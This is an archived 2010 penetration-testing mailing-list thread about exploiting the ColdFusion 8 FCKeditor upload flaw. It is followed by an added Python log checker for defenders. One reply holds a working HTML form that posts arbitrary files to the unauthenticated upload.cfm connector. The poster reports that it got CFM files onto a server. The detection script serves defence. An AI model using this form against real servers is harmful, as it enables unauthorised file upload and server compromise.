Penetration Testing mailing list archives

Re: ColdFusion 8 w/ FCKEditor


From: The Dead <th3d34d () gmail com>
Date: Wed, 30 Jun 2010 17:59:04 -0300

I got two servers with this condition.

In one of the servers, CFM files were allowed to be uploaded as ASP and
others. It was simple to upload to the server using an HTML-based form
as:

<html>
<form action="http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?"
method="post" enctype="multipart/form-data">
        <input type="file" name="NewFile">
        <input type="submit">
</form>
</html>

In another server, CFM extensions and others like ASP, PHP are not
allowed to be uploaded.
So, I'm trying something to solve this case.

On Wed, Jun 30, 2010 at 5:27 PM, The Dead <th3d34d () gmail com> wrote:
Thanks. I already got it!!
Case solved!

On Wed, Jun 30, 2010 at 5:06 PM, ADAMS, JEFF W (ATTSI) <ja3617 () att com> wrote:
This should get you started:)
http://theinterw3bs.com/?m=200910

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]
On Behalf Of The Dead
Sent: Tuesday, June 29, 2010 4:49 PM
To: pen-test () securityfocus com
Subject: ColdFusion 8 w/ FCKEditor

Hi,

Is there an exploit available for this vulnerability or a detailed page
explaining technical details about it?
How can I exploit it?
The vulnerability is:
http://www.adobe.com/support/security/bulletins/apsb09-09.html.

Thanks!

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------
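
For defenders checking a ColdFusion server for this issue, the following is an added example (not part of the original thread): a Python log check that flags requests to the FCKeditor file manager connector path shown in the form above. The Apache combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Directory of the connector named in the thread, lower-cased because
# ColdFusion on Windows/IIS resolves paths case-insensitively.
CONNECTOR_DIR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/"

# Assumed format: Apache/NCSA combined log. Adapt the regex for IIS W3C logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalise(target):
    """Drop the query string, percent-decode twice, collapse slashes, lower-case."""
    path = target.split("?", 1)[0]
    for _ in range(2):  # second pass catches double encoding such as %252F
        path = unquote(path)
    return re.sub(r"/+", "/", path.replace("\\", "/")).lower()

def find_connector_hits(lines):
    """Return (ip, timestamp, method, path, status, severity) per connector request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalise(m["target"])
        if not path.startswith(CONNECTOR_DIR):
            continue
        # A POST to upload.cfm answered with 2xx means the connector accepted a request.
        is_upload = m["method"] == "POST" and path.endswith("/upload.cfm")
        severity = "high" if is_upload and m["status"].startswith("2") else "review"
        hits.append((m["ip"], m["ts"], m["method"], path, int(m["status"]), severity))
    return hits

# Constructed sample lines (documentation IP ranges), not from a real server.
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm? HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Jan/2024:10:02:11 +0000] "GET /cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm HTTP/1.1" 200 120 "-" "-"',
    '198.51.100.23 - - [01/Jan/2024:10:02:40 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors%2Fcfm%2Fupload.cfm HTTP/1.1" 403 0 "-" "-"',
    '192.0.2.10 - - [01/Jan/2024:10:03:00 +0000] "GET /index.cfm HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_connector_hits(SAMPLE):
        print(hit)
```

Any hit means the connector is reachable from the network; a "high" hit should be followed by a review of the upload directory and of whether the fix from the Adobe bulletin cited in the thread has been applied.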